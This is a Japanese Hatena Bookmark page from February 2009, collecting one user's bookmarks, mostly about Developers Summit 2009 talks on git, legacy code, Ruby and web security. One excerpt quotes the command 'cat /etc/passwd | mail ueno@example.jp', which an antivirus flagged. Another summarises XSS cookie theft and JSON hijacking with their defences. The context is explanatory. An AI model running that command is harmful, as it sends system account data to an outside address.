ここは、管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。ふんわりほんわかな感じでお願いします。
2009年2月13日のブックマーク (13件)
-
TAKESAKO 2009/02/13
-
2009-02-13
行ってきましたよ。デブサミ2009のコミュニティLT。しかも司会で。あこがれの妙齢の女性 id:ngtyk と一緒に。和服を着て(コスプレだ)。 わたしは、勉強会勉強会の紹介。一番バッターおれおれ。 コミュニティ 発表者(敬称略) 関連URL 勉強会勉強会 よしおかひろたか(id:hyoshiok) http://groups.google.co.jp/group/metacon DevLove 市谷(id:papanda0806) http://groups.google.co.jp/group/devlove-link OpenSolarisユーザーグループ 加藤、瀧、太田 http://jp.opensolaris.org/ リナックスコンソーシアム 柏貴光 梅村知正 http://www.linuxcons.gr.jp/ オブジェクト倶楽部 懸田剛 http://ObjectClu
-
Canvasによる3Dテクスチャマッピングとパフォーマンスチューニング(仮題) - 最速チュパカブラ研究会
MAX 打ち上げのときに川崎さんに「英語の記事書いたら絶対ウケるから書くべきだよ」と言われていつ書こうかなーと思ってたら、そういえば11日は休日だったので、日本語の下書きだけでも一気に書いてみることにしました。 といっても、欲を出してあれもこれも書こうとして、結局まだ書ききれてませんけど。 タイトル案 Javascript と Canvas によるフルスクラッチ3Dプログラミング Javascript と Canvas 3Dプログラミング入門 ドキッ JSだらけの あと、今日(11日)は私の誕生日でもあります。25になりました。そろそろ鏡を見るのが怖くなってきますね。 以下、書きかけ Introduction Adobe MAX 2009 で Spark Project は、拡張現実(AR)のデモを展示し、来場者の注目を集めていた。Shibuya.JS のメンバーもこのデモに感激し、是非
-
デブサミでレガシーコードを語り合いました - 木曜不足
前回予告したとおり、Developers' Summit にてレガシーコードについて話させてもらいました。 聞きに来てくださった方、ありがとうございました。 会場も満員、感謝感謝です。 おそれていたとおり、座談会向けのキャラじゃあないことがばれてしまい、他のメンバーの会話にうまく絡むことができず…… その分、最後の方でソロパートをもらって思いの丈を語りまくらせてもらうという感じでなんとかかんとか義務を果たしてきました。ほ。 レガシーコードを対岸の風景のように見てもらうんじゃあなく、良くも悪くもとても身近な存在であり、それがあることで今まで悩んでいたことを言語化できるようになる(かもしれない)んだ、ということだけは持って帰ってもらいたかった。 いつものとはまた違う文芸部メソッドで、そこの一点突破を狙ったらあんな内容になってしまったわけだけど、ウケたのかなー? やっぱりお客さん 200 人とも
-
-
Office2007ドキュメント中のテキスト文章がウイルスとして検出される - うさぎ文学日記
メールの添付ファイルで、脆弱性の話の資料を送ったんですが、 送り先の方がSymantec AntiVirus Corporate Editionを使っていて、 教育用の資料を何度を送ってもウイルス扱いになって、 ファイルが削除されてしまうということがありました。 Office2007のファイルはXMLファイルを単にZIPで圧縮したものだから、 文章中に以下の文字が入ってたのがダメだったみたい。 cat /etc/passwd | mail ueno@example.jp ウイルス名「Unix.Penguin」として検出されたようでした。 Unix.Penguin は、Unix 上で動作する単純かつ悪質なシェル スクリプト プログラムです。Norton AntiVirus の Unix.Penguin 検出技術は、システム パスワード データ ファイルを外部に送信しようとする Unix シェ
-
Lunarr’s Elements is a Twitter-like image-sharing tool to stoke the imagination
Join our daily and weekly newsletters for the latest updates and exclusive content on industry-leading AI coverage. Learn More The downstream influence of social messaging service Twitter, which lets you message friends or hangers-on about what you’re doing or thinking at any given moment, is beginning to result in some interesting applications. One of those, Lunarr’s Elements, is kind of a visual
-
Webセキュリティ攻守攻防パネルディスカッション「Webアプリケーション/Ajaxセキュリティ徹底バトル」 - TechTalkManiacs
セッションの詳細についてはこちらを参考にしてください パネラーにはあのまちちゃんが、ということで大盛況でした。 モデレーターの竹迫さんがお題となる10のテーマを提示して、それについてパネラーの人が答える、という形式です。 はまちちゃんインフル三日目(汗) 自己紹介 NAMAZUの脆弱性対応 高木先生からの指摘 指摘がオープンになっていて、あわてて非公開に。 XSSについて 信頼できないサイトでは対策は無意味(はせがわさん) 一番信用できるのははまちやドットコム(笑) mixiの騒動の時に情報を抜かなかったら。む 例えばIEを使わない(大垣さん) イントラネットでも危険 JSONの脆弱性について そのままでは読めない(出来たらこの辺、JSONPについても欲しかったです) セッターとプロトタイプチェーンの組み合わせで、一部のモダンブラウザでは読み出せる JavaScriptでは、JSONによっ
-
DevSumi2009 Webセキュリティ攻守攻防パネルディスカッション「Webアプリケーション/Ajaxセキュリティ徹底バトル」 - monjudoh’s diary
XSSで何ができるか? cookie情報、formの送信内容を盗む、偽の情報を見せる 「信頼出来ないWebサイト」でのXSSはそもそも無意味 信頼してほしいならXSSくらい直せ イントラだったら関係ない? むしろイントラ内の方が盗みたい情報がいっぱいある JSONによる秘密情報の漏洩 JSON Hijacking Object.prototype.__defineSetter_で特定プロパティが設定されたら何らかの処理を行うようにする。 JSONをHTMLとして読み込むと上記のコードが入る。 対策 先頭にwhile(1);をつけて、JavaScriptとして実行出来ないようにする(Googleがやった) POSTのみ許可 XHRで特定のリクエストヘッダをつけるようにする レスポンスヘッダにcharsetを指定する charsetにUTF-7を指定すると、きちんとエスケープされているJSON
-
デブサミ2009で発表しました:「時を超えたプログラミングの道への道」 - 角谷HTML化計画(2009-02-12)
Invalid Text■<%=sn number %> <%=flickr_left '3274768929' %>デブサミ2009で発表しました:「時を超えたプログラミングの道への道」 つかれたのであとで書く。とりあえずスライド。最後までスライドめくれてよかった。 写真はtakaiのを借りてます。練習不足(というかスライド完成したのが10分前)でリモコンを見すぎてしまいました。情けないです。 The way to the timeless way of programmingView more presentations from Shintaro Kakutani. (tags: devsumi2009 xp) slideshare.net kakutani.com よくある質問と答え Q:動画はいつ公開されますか? A:録画してません。 Q:予稿とかないの? A:ありません。ひとえ
-
デブサミ2009 はてなの開発戦略 - 2nd life (移転しました)
先日のデブサミ2009で発表した、はてなの開発戦略 (すごい名前だ…) のプレゼン資料を公開します。前半は主に git の話で、後半ははてなブックマークリニューアルの、Perl 層の開発をどんな感じで行っていったか、という話です。 デブサミ2009 はてなの開発戦略View more presentations from hotchpotch. はてなの git では、中央のマスタレポジトリサーバがあって、そこから各自 clone / fetch して開発を行ってるので、完全に github のような分散のメリットを生かしているわけではありません。 しかし完全に分散を生かさずとも、git に移行したメリットは十分にあって、資料の中でもふれていますが、やはり一番便利なのが git のブランチ機能です。もうこれ無しでの開発は考えられないなぁ、ぐらいで、さくっとブランチ切って開発、ブランチの切り
-
Route 477(2009-02-12)
■ [ruby] 1.8.7は(海外で)なぜ不人気なのか ruby-talkでアンチ1.8.7スレが立ってると聞いたので斜め読みしてみた。 「1.8.6で動いてたコードが、1.8.7で動かないことがあったから」が主な理由っぽいなぁ。安定版なのに、気軽にバージョンアップできないじゃんっていう。 「バックポートなんていらね」という意見もある。「新しい機能が使いたければ1.9使うよ」ということらしい。(個人的には、「1.8のまま」新しい機能が使える1.8.7は好きなんだけどね) 「仕様が異なる」バージョンがいくつもあることはプログラマを混乱させる。 「1.8系が1.9に近くなったら、1.9に移行しなくてもいいやってならね?」(→これは逆だよなぁ。) 「初心者としては、違うバージョンがいくつもあると混乱する。1.8.6がピッケル本相当で、1.9.1がdblackの新しい本相当だよね?」 「1.8.
-
デブサミ2009「株式会社はてなの開発戦略」講演メモ - 元RX-7乗りの適当な日々
何だかんだで、今日唯一参加させていただいたセッションのメモ。 とりあえず、もうSubversionは捨てようと思います。 「株式会社はてなの開発戦略」 講演者 舘野 祐一 氏 id:secondlife 株式会社はてな 現在は、はてなブックマークのリードプログラマ PerlやらJava Scriptやら 社内開発環境整備 開発環境改善好き はてな 現在、従業員60名(アルバイト含む) うちエンジニア30名 インフラ8名、アプリケーション22名 2008年、はてなの開発に変化が・・・ git! git 分散VCS svnと比べて動作が高速 低コストなブランチ作成 賢いマージ SHA1によるデータ管理 コミットの情報など、全てがSHA1で管理される リビジョン1000などの概念はない 2008年初頭の世間の変化 RailsのVCSがgitへ移行 githubの出現 gitのこれはべんり svn
-
- 2009年2月14日
- 2009年2月13日
- 2009年2月12日
公式Twitter
- @HatenaBookmark
リリース、障害情報などのサービスのお知らせ
- @hatebu
最新の人気エントリーの配信
キーボードショートカット一覧
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Copyright © 2005-2025 Hatena. All Rights Reserved.
設定を変更しました